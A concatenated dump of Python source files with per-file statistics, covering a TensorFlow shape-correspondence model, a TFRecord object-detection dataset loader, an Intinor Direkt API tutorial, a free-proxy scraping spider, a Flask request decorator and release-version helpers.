    A = tf.matmul(part_evecs_trans, net['layer_%d_part' % (layer_C_est - 1)])
    net['A'] = A
    B = tf.matmul(model_evecs_trans, net['layer_%d_model' % (layer_C_est - 1)])
    net['B'] = B
    # FM-layer: evaluate C_est
    net['C_est'], safeguard_inverse = solve_ls(A, B)
    # Evaluate loss via soft-correspondence error
    with tf.variable_scope("pointwise_corr_loss"):
        P_norm, net_loss, unsupervised_loss = pointwise_corr_layer(net['C_est'], model_evecs, part_evecs_trans, model_dist_map, part_dist_map, part2model_ind_gt)
    tf.summary.scalar('net_loss', net_loss)
    merged = tf.summary.merge_all()
return net_loss, unsupervised_loss, safeguard_inverse, merged, P_norm, net | 38.409836 | 159 | 0.714469 | import tensorflow as tf
import numpy as np
from ops import *
flags = tf.app.flags
FLAGS = flags.FLAGS
def fmnet_model(phase, part_shot, model_shot, part_dist_map , model_dist_map, part2model_ind_gt, part_evecs, part_evecs_trans, model_evecs, model_evecs_trans):
    """Build FM-net model.
    Args:
        phase: train/test.
        part_shot: SHOT descriptor of source shape (part).
        model_shot: SHOT descriptor of target shape (model).
        dist_map: distance map on target shape to evaluate geodesic error
        part_evecs: eigenvectors on source shape
        part_evecs_trans: transposed part_evecs with mass matrix correction
        model_evecs: eigenvectors on target shape
        model_evecs_trans: transposed model_evecs with mass matrix correction
    Returns:
        net_loss, unsupervised_loss, safeguard_inverse, merged summaries,
        the soft correspondence matrix P_norm, and the dict of activations.
    """
    net = {}
    # Siamese stack of residual layers: scope.reuse_variables() makes the
    # same weights process both the part and the model descriptors.
    for i_layer in range(FLAGS.num_layers):
        with tf.variable_scope("layer_%d" % i_layer) as scope:
            if i_layer == 0:
                net['layer_%d_part' % i_layer] = res_layer(part_shot, dims_out=int(part_shot.shape[-1]), scope=scope,
                                                           phase=phase)
                scope.reuse_variables()
                net['layer_%d_model' % i_layer] = res_layer(model_shot, dims_out=int(model_shot.shape[-1]), scope=scope,
                                                            phase=phase)
            else:
                net['layer_%d_part' % i_layer] = res_layer(net['layer_%d_part' % (i_layer - 1)],
                                                           dims_out=int(part_shot.shape[-1]),
                                                           scope=scope, phase=phase)
                scope.reuse_variables()
                net['layer_%d_model' % i_layer] = res_layer(net['layer_%d_model' % (i_layer - 1)],
                                                            dims_out=int(part_shot.shape[-1]),
                                                            scope=scope, phase=phase)
    # project output features on the shape Laplacian eigen functions
    layer_C_est = i_layer + 1  # grab current layer index
    A = tf.matmul(part_evecs_trans, net['layer_%d_part' % (layer_C_est - 1)])
    net['A'] = A
    B = tf.matmul(model_evecs_trans, net['layer_%d_model' % (layer_C_est - 1)])
    net['B'] = B
    # FM-layer: evaluate C_est
    net['C_est'], safeguard_inverse = solve_ls(A, B)
    # Evaluate loss via soft-correspondence error
    with tf.variable_scope("pointwise_corr_loss"):
        P_norm, net_loss, unsupervised_loss = pointwise_corr_layer(net['C_est'], model_evecs, part_evecs_trans, model_dist_map, part_dist_map, part2model_ind_gt)
    tf.summary.scalar('net_loss', net_loss)
    merged = tf.summary.merge_all()
return net_loss, unsupervised_loss, safeguard_inverse, merged, P_norm, net | 0 | 0 | 0 |
be06dc1fd3e896347775ceb768b0220fa17cdd42 | 8,091 | py | Python | xcenternet/datasets/mcod_dataset.py | JuanchoWang/xcenternet | 1b6784bb3ff8bc44704a60fc6fd0b56dea190e29 | [
"Apache-2.0",
"MIT"
] | null | null | null | xcenternet/datasets/mcod_dataset.py | JuanchoWang/xcenternet | 1b6784bb3ff8bc44704a60fc6fd0b56dea190e29 | [
"Apache-2.0",
"MIT"
] | null | null | null | xcenternet/datasets/mcod_dataset.py | JuanchoWang/xcenternet | 1b6784bb3ff8bc44704a60fc6fd0b56dea190e29 | [
"Apache-2.0",
"MIT"
] | null | null | null | from random import shuffle
import tensorflow as tf
from xcenternet.datasets.dataset import Dataset
class TfExampleFields(object):
    """TF-example proto feature names
    Holds the standard feature names to load from an Example proto
    Attributes:
        image_encoded: image encoded as string
        image_format: image format, e.g. "JPEG"
        filename: filename
        channels: number of channels of image
        colorspace: colorspace, e.g. "RGB"
        height: height of image in pixels, e.g. 462
        width: width of image in pixels, e.g. 581
        source_id: original source of the image
        image_class_text: image-level label in text format
        image_class_label: image-level label in numerical format
        object_class_text: labels in text format, e.g. ["person", "cat"]
        object_class_label: labels in numbers, e.g. [16, 8]
        object_bbox_xmin: xmin coordinates of groundtruth box, e.g. 10, 30
        object_bbox_xmax: xmax coordinates of groundtruth box, e.g. 50, 40
        object_bbox_ymin: ymin coordinates of groundtruth box, e.g. 40, 50
        object_bbox_ymax: ymax coordinates of groundtruth box, e.g. 80, 70
        ignore_area_bbox_xmin: xmin coordinates of ignore box, e.g. 10, 30
        ignore_area_bbox_xmax: xmax coordinates of ignore box, e.g. 50, 40
        ignore_area_bbox_ymin: ymin coordinates of ignore box, e.g. 40, 50
        ignore_area_bbox_ymax: ymax coordinates of ignore box, e.g. 80, 70
        object_view: viewpoint of object, e.g. ["frontal", "left"]
        object_truncated: is object truncated, e.g. [true, false]
        object_occluded: is object occluded, e.g. [true, false]
        object_difficult: is object difficult, e.g. [true, false]
        object_group_of: is object a single object or a group of objects
        object_depiction: is object a depiction
        object_segment_area: the area of the segment.
        object_weight: a weight factor for the object's bounding box.
        instance_masks: instance segmentation masks.
        instance_boundaries: instance boundaries.
        instance_classes: Classes for each instance segmentation mask.
        detection_class_label: class label in numbers.
        detection_bbox_ymin: ymin coordinates of a detection box.
        detection_bbox_xmin: xmin coordinates of a detection box.
        detection_bbox_ymax: ymax coordinates of a detection box.
        detection_bbox_xmax: xmax coordinates of a detection box.
        detection_score: detection score for the class label and box.
    Note: several names documented above (instance_masks, instance_boundaries,
    instance_classes and the detection_* fields) are not defined as attributes
    of this class.
    """
    image_encoded = 'image/encoded'
    image_format = 'image/format' # format is reserved keyword
    key = 'image/key/sha256'
    filename = 'image/filename'
    channels = 'image/channels'
    colorspace = 'image/colorspace'
    height = 'image/height'
    width = 'image/width'
    source_id = 'image/source_id'
    image_class_text = 'image/class/text'
    image_class_label = 'image/class/label'
    image_class_synset = 'image/class/synset'
    object_class_text = 'image/object/class/text'
    object_class_label = 'image/object/class/label'
    ignore_area_bbox_xmin = 'image/ignore_area/bbox/xmin'
    ignore_area_bbox_ymin = 'image/ignore_area/bbox/ymin'
    ignore_area_bbox_xmax = 'image/ignore_area/bbox/xmax'
    ignore_area_bbox_ymax = 'image/ignore_area/bbox/ymax'
    object_bbox_ymin = 'image/object/bbox/ymin'
    object_bbox_xmin = 'image/object/bbox/xmin'
    object_bbox_ymax = 'image/object/bbox/ymax'
    object_bbox_xmax = 'image/object/bbox/xmax'
    object_bbox_label = 'image/object/bbox/label'
    object_bbox_split_line = 'image/object/bbox/vl'
    object_bbox_split_type = 'image/object/bbox/vertical_line_type'
    object_view = 'image/object/view'
    object_truncated = 'image/object/truncated'
    object_occluded = 'image/object/occluded'
    object_difficult = 'image/object/difficult'
    object_group_of = 'image/object/group_of'
    object_depiction = 'image/object/depiction'
    object_segment_area = 'image/object/segment/area'
    object_weight = 'image/object/weight'
    semseg_channels = 'image/segmentation/channels'
    semseg_data = 'image/segmentation/data'
    semseg_format = 'image/segmentation/format'
    semseg_height = 'image/segmentation/height'
| 47.87574 | 109 | 0.707082 | from random import shuffle
import tensorflow as tf
from xcenternet.datasets.dataset import Dataset
class McodDataset(Dataset):
    """TFRecord-backed MCOD object-detection dataset (9 classes).

    Wires a tf.Example feature spec into the project's Dataset base class
    and provides decoding, LR scheduling and train/val loading hooks.
    """
    def __init__(self, dataset_path_tr, dataset_path_te, init_lr):
        # Feature spec consumed by decode() when parsing serialized protos.
        self.features = {
            TfExampleFields.height: tf.io.FixedLenFeature((), dtype=tf.int64, default_value=1),
            TfExampleFields.width: tf.io.FixedLenFeature((), dtype=tf.int64, default_value=1),
            TfExampleFields.colorspace: tf.io.FixedLenFeature((), dtype=tf.string, default_value=''),
            TfExampleFields.channels: tf.io.FixedLenFeature((), dtype=tf.int64, default_value=1),
            TfExampleFields.image_class_label: tf.io.FixedLenFeature([], dtype=tf.int64, default_value=-1),
            TfExampleFields.image_class_synset: tf.io.FixedLenFeature([], dtype=tf.string, default_value=''),
            TfExampleFields.image_class_text: tf.io.FixedLenFeature([], dtype=tf.string, default_value=''),
            TfExampleFields.object_bbox_ymin: tf.io.VarLenFeature(tf.float32),
            TfExampleFields.object_bbox_xmin: tf.io.VarLenFeature(tf.float32),
            TfExampleFields.object_bbox_ymax: tf.io.VarLenFeature(tf.float32),
            TfExampleFields.object_bbox_xmax: tf.io.VarLenFeature(tf.float32),
            TfExampleFields.image_format: tf.io.FixedLenFeature((), tf.string, default_value='jpeg'),
            TfExampleFields.filename: tf.io.FixedLenFeature((), tf.string, default_value=''),
            TfExampleFields.image_encoded: tf.io.FixedLenFeature((), tf.string, default_value=''),
        }
        num_classes = 9
        self.path_train_set = dataset_path_tr
        self.path_val_set = dataset_path_te
        super().__init__(num_classes, init_lr)
    def scheduler(self, epoch):
        # Step LR schedule: full rate until epoch 40, x0.1 until 80, then x0.01.
        # self.initial_learning_rate is presumably set by the Dataset base
        # class from init_lr -- confirm against its __init__.
        if epoch < 40:
            return self.initial_learning_rate
        elif epoch < 80:
            return self.initial_learning_rate * 0.1
        else:
            return self.initial_learning_rate * 0.01
    def decode(self, data):
        """Return a single image with its labels, bounding boxes and id
        Copied from Modellbau
        Args:
            data: a string tensor holding a serialized protocol buffer corresponding
            to data for a single image
        Returns:
            image: image tensor ([H, W, 3])
            labels: class label tensor, reshaped to [-1]
            bboxes: [N, 4] boxes stacked in (ymin, xmin, ymax, xmax) order
            image_id: the example's filename string tensor
        """
        par_feat = tf.io.parse_single_example(data, self.features)
        image = tf.io.decode_image(par_feat[TfExampleFields.image_encoded], channels=3)
        image.set_shape([None, None, 3])
        # Box coordinates come in as sparse tensors; densify before stacking.
        object_bbox_xmin = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_xmin])
        object_bbox_xmax = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_xmax])
        object_bbox_ymin = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_ymin])
        object_bbox_ymax = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_ymax])
        bbox = tf.stack([object_bbox_ymin, object_bbox_xmin, object_bbox_ymax, object_bbox_xmax], axis=-1)
        label = par_feat[TfExampleFields.image_class_label]
        # added by Xiao
        image_id = par_feat[TfExampleFields.filename]
        labels = tf.reshape(label, [-1])
        bboxes = tf.reshape(bbox, [-1, 4])
        return image, labels, bboxes, image_id
    def _load_dataset(self, filenames, shuffle_tfrecords=True):
        # Shuffles the list of TFRecord *files* in place (record-level
        # shuffling is left to the caller).
        if shuffle_tfrecords:
            shuffle(filenames)
        ds = tf.data.TFRecordDataset(filenames)
        return ds
    def load_train_datasets(self):
        """Return (train dataset, number of records) -- counting iterates the
        whole dataset once, which can be slow for large record files."""
        dataset_train = self._load_dataset(filenames=self.path_train_set)
        dataset_train_size = sum(1 for _ in dataset_train)
        return dataset_train, dataset_train_size
    def load_validation_datasets(self):
        """Return (validation dataset, number of records)."""
        dataset_valid = self._load_dataset(filenames=self.path_val_set)
        dataset_valid_size = sum(1 for _ in dataset_valid)
        return dataset_valid, dataset_valid_size
class TfExampleFields(object):
    """TF-example proto feature names
    Holds the standard feature names to load from an Example proto
    Attributes:
        image_encoded: image encoded as string
        image_format: image format, e.g. "JPEG"
        filename: filename
        channels: number of channels of image
        colorspace: colorspace, e.g. "RGB"
        height: height of image in pixels, e.g. 462
        width: width of image in pixels, e.g. 581
        source_id: original source of the image
        image_class_text: image-level label in text format
        image_class_label: image-level label in numerical format
        object_class_text: labels in text format, e.g. ["person", "cat"]
        object_class_label: labels in numbers, e.g. [16, 8]
        object_bbox_xmin: xmin coordinates of groundtruth box, e.g. 10, 30
        object_bbox_xmax: xmax coordinates of groundtruth box, e.g. 50, 40
        object_bbox_ymin: ymin coordinates of groundtruth box, e.g. 40, 50
        object_bbox_ymax: ymax coordinates of groundtruth box, e.g. 80, 70
        ignore_area_bbox_xmin: xmin coordinates of ignore box, e.g. 10, 30
        ignore_area_bbox_xmax: xmax coordinates of ignore box, e.g. 50, 40
        ignore_area_bbox_ymin: ymin coordinates of ignore box, e.g. 40, 50
        ignore_area_bbox_ymax: ymax coordinates of ignore box, e.g. 80, 70
        object_view: viewpoint of object, e.g. ["frontal", "left"]
        object_truncated: is object truncated, e.g. [true, false]
        object_occluded: is object occluded, e.g. [true, false]
        object_difficult: is object difficult, e.g. [true, false]
        object_group_of: is object a single object or a group of objects
        object_depiction: is object a depiction
        object_segment_area: the area of the segment.
        object_weight: a weight factor for the object's bounding box.
        instance_masks: instance segmentation masks.
        instance_boundaries: instance boundaries.
        instance_classes: Classes for each instance segmentation mask.
        detection_class_label: class label in numbers.
        detection_bbox_ymin: ymin coordinates of a detection box.
        detection_bbox_xmin: xmin coordinates of a detection box.
        detection_bbox_ymax: ymax coordinates of a detection box.
        detection_bbox_xmax: xmax coordinates of a detection box.
        detection_score: detection score for the class label and box.
    Note: several names documented above (instance_masks, instance_boundaries,
    instance_classes and the detection_* fields) are not defined as attributes
    of this class.
    """
    image_encoded = 'image/encoded'
    image_format = 'image/format' # format is reserved keyword
    key = 'image/key/sha256'
    filename = 'image/filename'
    channels = 'image/channels'
    colorspace = 'image/colorspace'
    height = 'image/height'
    width = 'image/width'
    source_id = 'image/source_id'
    image_class_text = 'image/class/text'
    image_class_label = 'image/class/label'
    image_class_synset = 'image/class/synset'
    object_class_text = 'image/object/class/text'
    object_class_label = 'image/object/class/label'
    ignore_area_bbox_xmin = 'image/ignore_area/bbox/xmin'
    ignore_area_bbox_ymin = 'image/ignore_area/bbox/ymin'
    ignore_area_bbox_xmax = 'image/ignore_area/bbox/xmax'
    ignore_area_bbox_ymax = 'image/ignore_area/bbox/ymax'
    object_bbox_ymin = 'image/object/bbox/ymin'
    object_bbox_xmin = 'image/object/bbox/xmin'
    object_bbox_ymax = 'image/object/bbox/ymax'
    object_bbox_xmax = 'image/object/bbox/xmax'
    object_bbox_label = 'image/object/bbox/label'
    object_bbox_split_line = 'image/object/bbox/vl'
    object_bbox_split_type = 'image/object/bbox/vertical_line_type'
    object_view = 'image/object/view'
    object_truncated = 'image/object/truncated'
    object_occluded = 'image/object/occluded'
    object_difficult = 'image/object/difficult'
    object_group_of = 'image/object/group_of'
    object_depiction = 'image/object/depiction'
    object_segment_area = 'image/object/segment/area'
    object_weight = 'image/object/weight'
    semseg_channels = 'image/segmentation/channels'
    semseg_data = 'image/segmentation/data'
    semseg_format = 'image/segmentation/format'
    semseg_height = 'image/segmentation/height'
    semseg_width = 'image/segmentation/width'
| 2,335 | 1,500 | 23 |
db00ae2ea98be4abf7a161b404049c4e77de3c0b | 2,389 | py | Python | python_examples/example_01_basics_for_direkt_requests.py | intinor/direkt_api_tutorial | ecbc0f7366d275666f0b174041c7d20314c1db3c | [
"MIT"
] | 1 | 2022-03-08T13:35:11.000Z | 2022-03-08T13:35:11.000Z | python_examples/example_01_basics_for_direkt_requests.py | intinor/direkt_api_tutorial | ecbc0f7366d275666f0b174041c7d20314c1db3c | [
"MIT"
] | null | null | null | python_examples/example_01_basics_for_direkt_requests.py | intinor/direkt_api_tutorial | ecbc0f7366d275666f0b174041c7d20314c1db3c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Intinor Direkt API Python tutorial
Example 1: Send a request to a Direkt unit using the "direkt" module
and obtain API information as a JSON string
"""
import sys
# The "direkt" module wraps the "requests" library with some convenient
# functionality for the Intinor Direkt API.
import direkt
# START of configuration
# Replace the below example ID "D0****" with the ID of your Direkt unit to
# create the correct Direkt unit URL. This will point to the API root.
# Case-sensitive: Write the Direkt ID with a capital "D".
DIREKT_ID = "D0****"
# Assign "DIREKT_HOST" the hostname or IP address of your Direkt unit or
# "iss.intinor.com" if you want to send requests to the API through ISS.
DIREKT_HOST = "Hostname-or-IP-address"
# Replace username and password in the authentication below with the actual
# username and password for your Direkt unit or for your ISS account, if you
# assigned "DIREKT_HOST" with "iss.intinor.com".
AUTHENTICATION = ("username", "password")
# NOTES:
# Writing credentials into a script is not a secure practise but it makes a
# quick and easy start possible. Choose a more secure approach for usage beyond
# this tutorial.
# The default credentials for your Direkt unit can only be used through local
# network connections and we recommend changing them for security. This can be
# done in the unit's webinterface or in ISS.
# We recommend creating a shared API user account for your team.
# END of configuration
# The URL to the API root is created here. The API root is a good starting
# point resource which is available on all Direkt unit types.
URL = "https://" + DIREKT_HOST + "/api/v1/units/" + DIREKT_ID
def main():
"""Obtain the API resource"""
# Use a GET request to obtain the API resource.
response = direkt.get(URL, auth=AUTHENTICATION)
# Show the text property of the response, which is in JSON string format.
print(response.text)
if not response.ok:
sys.exit("GET '" + URL + "' failed.")
if __name__ == '__main__':
main()
# We recommend using the "direkt" module for API requests through local network
# connections and through ISS connections but alternatively it is possible to
# access the API without using the "direkt" module, in which case you import
# the "requests" library and connect through ISS.
# See Example 2 for more information.
| 32.283784 | 79 | 0.735036 | #!/usr/bin/env python3
"""Intinor Direkt API Python tutorial
Example 1: Send a request to a Direkt unit using the "direkt" module
and obtain API information as a JSON string
"""
import sys
# The "direkt" module wraps the "requests" library with some convenient
# functionality for the Intinor Direkt API.
import direkt
# START of configuration
# Replace the below example ID "D0****" with the ID of your Direkt unit to
# create the correct Direkt unit URL. This will point to the API root.
# Case-sensitive: Write the Direkt ID with a capital "D".
DIREKT_ID = "D0****"
# Assign "DIREKT_HOST" the hostname or IP address of your Direkt unit or
# "iss.intinor.com" if you want to send requests to the API through ISS.
DIREKT_HOST = "Hostname-or-IP-address"
# Replace username and password in the authentication below with the actual
# username and password for your Direkt unit or for your ISS account, if you
# assigned "DIREKT_HOST" with "iss.intinor.com".
AUTHENTICATION = ("username", "password")
# NOTES:
# Writing credentials into a script is not a secure practise but it makes a
# quick and easy start possible. Choose a more secure approach for usage beyond
# this tutorial.
# The default credentials for your Direkt unit can only be used through local
# network connections and we recommend changing them for security. This can be
# done in the unit's webinterface or in ISS.
# We recommend creating a shared API user account for your team.
# END of configuration
# The URL to the API root is created here. The API root is a good starting
# point resource which is available on all Direkt unit types.
URL = "https://" + DIREKT_HOST + "/api/v1/units/" + DIREKT_ID
def main():
"""Obtain the API resource"""
# Use a GET request to obtain the API resource.
response = direkt.get(URL, auth=AUTHENTICATION)
# Show the text property of the response, which is in JSON string format.
print(response.text)
if not response.ok:
sys.exit("GET '" + URL + "' failed.")
if __name__ == '__main__':
main()
# We recommend using the "direkt" module for API requests through local network
# connections and through ISS connections but alternatively it is possible to
# access the API without using the "direkt" module, in which case you import
# the "requests" library and connect through ISS.
# See Example 2 for more information.
| 0 | 0 | 0 |
e18ab7550d94b330264c78c211546ae6cac394fd | 2,519 | py | Python | hproxy/spider/proxy_spider/mimvp_spider.py | yejianxin2015/hproxy | f40266bf7b06368d3ebfdce8d60385bcd4b93713 | [
"MIT"
] | null | null | null | hproxy/spider/proxy_spider/mimvp_spider.py | yejianxin2015/hproxy | f40266bf7b06368d3ebfdce8d60385bcd4b93713 | [
"MIT"
] | null | null | null | hproxy/spider/proxy_spider/mimvp_spider.py | yejianxin2015/hproxy | f40266bf7b06368d3ebfdce8d60385bcd4b93713 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Created by howie.hu at 08/04/2018.
"""
import asyncio
import time
from hproxy.database import DatabaseSetting
from hproxy.spider.base_spider import ProxySpider
from hproxy.spider.proxy_spider import MimvpItem
from hproxy.spider.proxy_tools import request_url_by_aiohttp, get_proxy_info
db_client = DatabaseSetting()
class MimvpSpider(ProxySpider):
    """
    Fetch proxies from https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page=1
    """
    spider_name = 'mimvp'
    item = MimvpItem

    async def get_proxy(self):
        """
        Fetch proxies from https://proxy.mimvp.com

        Scrapes listing pages 1-63, validates every candidate proxy
        concurrently via save_proxy(), then logs a crawl summary.
        :return: None
        """
        start = time.time()
        tasks = []
        for url in ['https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page={}'.format(i) for i in range(1, 64)]:
            html = await request_url_by_aiohttp(url=url)
            if html:
                items_data = self.item.get_items(html=html)
                for item_data in items_data:
                    if item_data.values:
                        tasks.append(asyncio.ensure_future(self.save_proxy(item_data.values)))
        # Bugfix: asyncio.wait() raises ValueError when given an empty
        # collection, which happened whenever no page yielded a proxy.
        if not tasks:
            self.logger.info(type="Spidering finished...", message="Crawling {0} finished,total proxy num : 0 - valid proxy num :0,Time costs :{1}".format(
                self.spider_name,
                time.time() - start))
            return
        done_list, pending_list = await asyncio.wait(tasks)
        # Count candidates that were validated and stored successfully.
        good_nums = sum(1 for task in done_list if task.result())
        self.logger.info(type="Spidering finished...",message="Crawling {0} finished,total proxy num : {1} - valid proxy num :{2},Time costs :{3}".format(
            self.spider_name,
            len(tasks),
            good_nums,
            time.time() - start))

    async def save_proxy(self, ip_info):
        """
        Validate a candidate proxy and persist it when usable.
        :param ip_info: (0.0.0.0, 8080)
        :return: True when the proxy was valid and stored, else False
        """
        ip, port = ip_info
        isOk, info = await get_proxy_info(ip, port, getInfo=True)
        if not isOk:
            return False
        try:
            # Save proxy
            await db_client.insert(field="{0}:{1}".format(ip, port), value=info)
            self.logger.info(type='Valid proxy', message="{0}: {1}:{2} had been saved".format(self.spider_name, ip, port))
            return True
        except Exception:
            # Storage failed; report the proxy as abandoned rather than crash
            # the crawl.
            self.logger.info(type='Invalid proxy', message="{0}: {1}:{2} had been abandoned".format(self.spider_name, ip, port))
            return False
async def start():
    """
    Start spider
    :return:
    """
    # NOTE(review): this awaits MimvpItem.start(), not MimvpSpider -- confirm
    # that the item class is the intended crawl entry point.
    await MimvpItem.start()
if __name__ == '__main__':
    # Start
    asyncio.get_event_loop().run_until_complete(start())
| 29.988095 | 155 | 0.588329 | #!/usr/bin/env python
"""
Created by howie.hu at 08/04/2018.
"""
import asyncio
import time
from hproxy.database import DatabaseSetting
from hproxy.spider.base_spider import ProxySpider
from hproxy.spider.proxy_spider import MimvpItem
from hproxy.spider.proxy_tools import request_url_by_aiohttp, get_proxy_info
db_client = DatabaseSetting()
class MimvpSpider(ProxySpider):
    """
    Fetch proxies from https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page=1
    """
    spider_name = 'mimvp'
    item = MimvpItem
    async def get_proxy(self):
        """
        Fetch proxies from https://proxy.mimvp.com
        :return:
        """
        start = time.time()
        tasks = []
        # Scrape listing pages 1-63; each candidate proxy is validated and
        # stored concurrently via save_proxy().
        for url in ['https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page={}'.format(i) for i in range(1, 64)]:
            html = await request_url_by_aiohttp(url=url)
            if html:
                items_data = self.item.get_items(html=html)
                for item_data in items_data:
                    if item_data.values:
                        tasks.append(asyncio.ensure_future(self.save_proxy(item_data.values)))
        # NOTE(review): asyncio.wait() raises ValueError when tasks is empty,
        # i.e. whenever no page yielded a proxy -- guard before waiting.
        done_list, pending_list = await asyncio.wait(tasks)
        good_nums = 0
        for task in done_list:
            if task.result():
                good_nums += 1
        self.logger.info(type="Spidering finished...",message="Crawling {0} finished,total proxy num : {1} - valid proxy num :{2},Time costs :{3}".format(
            self.spider_name,
            len(tasks),
            good_nums,
            time.time() - start))
    async def save_proxy(self, ip_info):
        """
        Save proxy
        :param ip_info: (0.0.0.0, 8080)
        :return: True when the proxy was valid and stored, else False
        """
        ip, port = ip_info
        isOk, info = await get_proxy_info(ip, port, getInfo=True)
        if isOk:
            # Save proxy
            try:
                await db_client.insert(field="{0}:{1}".format(ip, port), value=info)
                self.logger.info(type='Valid proxy', message="{0}: {1}:{2} had been saved".format(self.spider_name, ip, port))
                return True
            except Exception as e:
                # NOTE(review): this branch fires on a *storage* failure, yet
                # logs the proxy as invalid -- possibly misleading.
                self.logger.info(type='Invalid proxy', message="{0}: {1}:{2} had been abandoned".format(self.spider_name, ip, port))
                return False
        return False
async def start():
    """
    Start spider
    :return:
    """
    # NOTE(review): this awaits MimvpItem.start(), not MimvpSpider -- confirm
    # that the item class is the intended crawl entry point.
    await MimvpItem.start()
if __name__ == '__main__':
    # Start
    asyncio.get_event_loop().run_until_complete(start())
| 0 | 0 | 0 |
7fef8222041c4acd1301c7154532629ffd87de23 | 562 | py | Python | server/src/util.py | Opportunity-Hack-2015-Arizona/Team1 | 49b432d1e1bfae90551967f796338cfb9da6a89d | [
"MIT"
] | 1 | 2015-10-11T05:33:44.000Z | 2015-10-11T05:33:44.000Z | server/src/util.py | Opportunity-Hack-2015-Arizona/Team1 | 49b432d1e1bfae90551967f796338cfb9da6a89d | [
"MIT"
] | null | null | null | server/src/util.py | Opportunity-Hack-2015-Arizona/Team1 | 49b432d1e1bfae90551967f796338cfb9da6a89d | [
"MIT"
] | null | null | null | from functools import wraps
from flask import request
| 24.434783 | 101 | 0.622776 | from functools import wraps
from flask import request
def authenticate(func):
    """Decorator that rejects requests lacking a JSON body with a 401.

    TODO: replace with real authentication -- currently a request counts as
    authenticated merely because it carries JSON.
    """
    @wraps(func)
    def auth_call(*args, **kwargs):
        # Guard clause: no JSON payload means no credentials to check.
        if not request.json:
            return "Authentication Failed", 401
        return func(*args, **kwargs)
    return auth_call
def validate(obj, *args):
    """Check that each required key is present in *obj*.

    Args:
        obj: mapping to validate (e.g. a parsed JSON request body).
        *args: names of required keys; duplicates are checked only once.

    Returns:
        Tuple of "<name> is required" messages in argument order, empty
        when every key is present.
    """
    # dict.fromkeys dedupes like set() did, but keeps a deterministic,
    # first-seen order for the error messages (set iteration order was
    # arbitrary). Also avoids the quadratic tuple re-concatenation.
    required_keys = dict.fromkeys(args)
    return tuple(key + " is required" for key in required_keys if key not in obj)
| 460 | 0 | 46 |
de03dc6cbce490d45e09e58f380fdbd937ffe590 | 1,966 | py | Python | releng/lib/__init__.py | imoisharma/emissary | 5346ccb06673827a6a2e51ddaf92925f60bd9de9 | [
"Apache-2.0"
] | null | null | null | releng/lib/__init__.py | imoisharma/emissary | 5346ccb06673827a6a2e51ddaf92925f60bd9de9 | [
"Apache-2.0"
] | null | null | null | releng/lib/__init__.py | imoisharma/emissary | 5346ccb06673827a6a2e51ddaf92925f60bd9de9 | [
"Apache-2.0"
] | 1 | 2021-03-04T10:23:33.000Z | 2021-03-04T10:23:33.000Z | #!/hint/python3
import re
import subprocess
from typing import Any, List
from os import getenv
import subprocess
from .gitutil import git_check_clean as git_check_clean # Stop mypy complaining about implicit reexport
from .uiutil import run_txtcapture
from .gitutil import git_add as git_add # Stop mypy complaining about implicit reexport
# These are some regular expressions to validate and parse
# X.Y.Z[-rc.N] versions.
re_rc = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-rc\.([0-9]+)$')
re_ga = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)$')
re_ea = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-ea$')
# Capture-group indices for the match objects produced by the regexes above.
vX = 1
vY = 2
vZ = 3
vN = 4
DEFAULT_REPO = "emissary-ingress/emissary"
def base_version(release_version: str) -> str:
    """Given 'X.Y.Z[-rc.N]', return 'X.Y'."""
    # Drop the patch component from the X.Y.Z build version.
    major_minor_patch = build_version(release_version)
    return major_minor_patch.rsplit('.', 1)[0]
def build_version(release_version: str) -> str:
    """Given 'X.Y.Z[-rc.N]', return 'X.Y.Z'."""
    # Everything before the first '-' (partition == split('-')[0]).
    return release_version.partition('-')[0]
def assert_eq(actual: Any, expected: Any) -> None:
    """Equality assertion with a readable failure message.

    Behaves like `assert actual == expected`, but always reports both
    values when they differ.
    """
    if actual == expected:
        return
    raise AssertionError(f"wanted '{expected}', got '{actual}'")
def get_is_private() -> bool:
    """Return whether we're in a "private" Git checkout, for doing
    embargoed work.
    """
    urls: List[str] = []
    for remote in run_txtcapture(['git', 'remote']).split():
        urls.extend(run_txtcapture(['git', 'remote', 'get-url', '--all', remote]).split())
    # 'private' contains no newline, so substring-matching each URL is
    # equivalent to the original join-then-search over all URLs.
    return any('private' in url for url in urls)
| 31.709677 | 104 | 0.639369 | #!/hint/python3
import re
import subprocess
from typing import Any, List
from os import getenv
import subprocess
from .gitutil import git_check_clean as git_check_clean # Stop mypy complaining about implicit reexport
from .uiutil import run_txtcapture
from .gitutil import git_add as git_add # Stop mypy complaining about implicit reexport
# These are some regular expressions to validate and parse
# X.Y.Z[-rc.N] versions.
re_rc = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-rc\.([0-9]+)$')
re_ga = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)$')
re_ea = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-ea$')
# Capture-group indices for the match objects produced by the regexes above.
vX = 1
vY = 2
vZ = 3
vN = 4
DEFAULT_REPO = "emissary-ingress/emissary"
def base_version(release_version: str) -> str:
    """Given 'X.Y.Z[-rc.N]', return 'X.Y'."""
    # Drop the patch component from the X.Y.Z build version.
    major_minor_patch = build_version(release_version)
    return major_minor_patch.rsplit('.', 1)[0]
def build_version(release_version: str) -> str:
    """Given 'X.Y.Z[-rc.N]', return 'X.Y.Z'."""
    # Everything before the first '-' (partition == split('-')[0]).
    return release_version.partition('-')[0]
def assert_eq(actual: Any, expected: Any) -> None:
    """Equality assertion with a readable failure message.

    Behaves like `assert actual == expected`, but always reports both
    values when they differ.
    """
    if actual == expected:
        return
    raise AssertionError(f"wanted '{expected}', got '{actual}'")
def get_is_private() -> bool:
    """Return whether we're in a "private" Git checkout, for doing
    embargoed work.
    """
    urls: List[str] = []
    for remote in run_txtcapture(['git', 'remote']).split():
        urls.extend(run_txtcapture(['git', 'remote', 'get-url', '--all', remote]).split())
    # 'private' contains no newline, so substring-matching each URL is
